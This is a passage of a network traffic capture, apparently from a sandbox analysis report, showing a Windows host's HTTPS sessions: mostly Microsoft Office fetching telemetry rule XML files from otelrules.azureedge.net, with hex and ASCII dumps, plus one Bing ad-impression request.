encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	49826	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:49 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:49 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 1f17df4b-601e-0050-2d03-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095149Z-r1cf579d778t6txphC1EWRsd4400000002gg000000001rqa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:49 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:49 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:49 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 4c7743ed-001e-0082-4b03-485880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095149Z-r1cf579d778xq4f9hC1EWRx41g00000001v00000000022a6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:49 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.6	49828	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:50 UTC	921	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PYwZb5jzUszxXLhoKSvtQDVUCUz2DQQTbtfuHORf_W5QwxBOzlUBs9_EJcUhJgqAU9uX9BQciAkz3E-HbgLnhhz1TwN9WGpscjesnNfGXGZDVfXefq7gYrjtb6kzUmTiaEgS-OCNys-1nUln_W_a46hGPe1h6gVE1L8JE7qshXCdq7tj%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D88a3a4f4da3e118b1d56c3a0c0aba7aa&TIME=20241207T095141Z&CID=531538185&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive Cookie: MUID=0A49FE9DEB916FEB0960EBD3EAF36E5C; _EDGE_S=SID=0FA82018DF2A6F023D4C3556DE326EFE; MR=0
2024-12-07 09:51:50 UTC	763	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MSPTC=KCZpBzvWSr0TtXVfeZpkq7WBvJORnSvZKTwsjPuDK5I; domain=.bing.com; expires=Thu, 01-Jan-2026 09:51:50 GMT; path=/; Partitioned; secure; SameSite=None Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 3EFFCE291FDA4811BA10B46058CB547B Ref B: EWR30EDGE1615 Ref C: 2024-12-07T09:51:50Z Date: Sat, 07 Dec 2024 09:51:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	49832	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:51 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:51 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:51 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 8332a10a-c01e-0079-4304-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095151Z-r1cf579d778qlpkrhC1EWRpfc800000002rg000000001b0p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:51 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:51 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:51 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:51 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: a374b664-e01e-0051-1f05-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095151Z-r1cf579d77867vg8hC1EWR8knc00000001v0000000002ank x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:51 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:51 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:51 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 83778e64-b01e-0070-6d05-481cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095151Z-r1cf579d778xr2r4hC1EWRqvfs0000000240000000000w8v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:52 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:51 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:51 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: f6e8c48a-401e-000a-8008-484a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095151Z-r1cf579d778lntp7hC1EWR9gg400000001f0000000001xfv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:52 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.6	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:51 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:51 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: e8b3d2c0-701e-0050-0b05-486767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095151Z-r1cf579d778t5c2lhC1EWRce3w00000002m0000000003ncg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:52 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.6	49834	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:53 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:54 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:53 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: fdf3550d-a01e-0070-7703-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095153Z-r1cf579d7782ctslhC1EWRfbrw00000002g0000000001s0e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:54 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.6	49835	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:53 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:54 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:53 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1dbd65e4-a01e-0002-7203-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095153Z-r1cf579d778x776bhC1EWRdk80000000024g00000000053m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:54 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.6	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:53 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:54 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:54 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 555e9168-001e-0017-4603-480c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095154Z-r1cf579d778zvkpnhC1EWRv23g000000026g0000000030ss x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:54 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.6	49838	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:53 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:58 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:58 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 18148ef3-001e-002b-2504-4899f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095158Z-r1cf579d778t6txphC1EWRsd4400000002hg000000001617 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:58 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

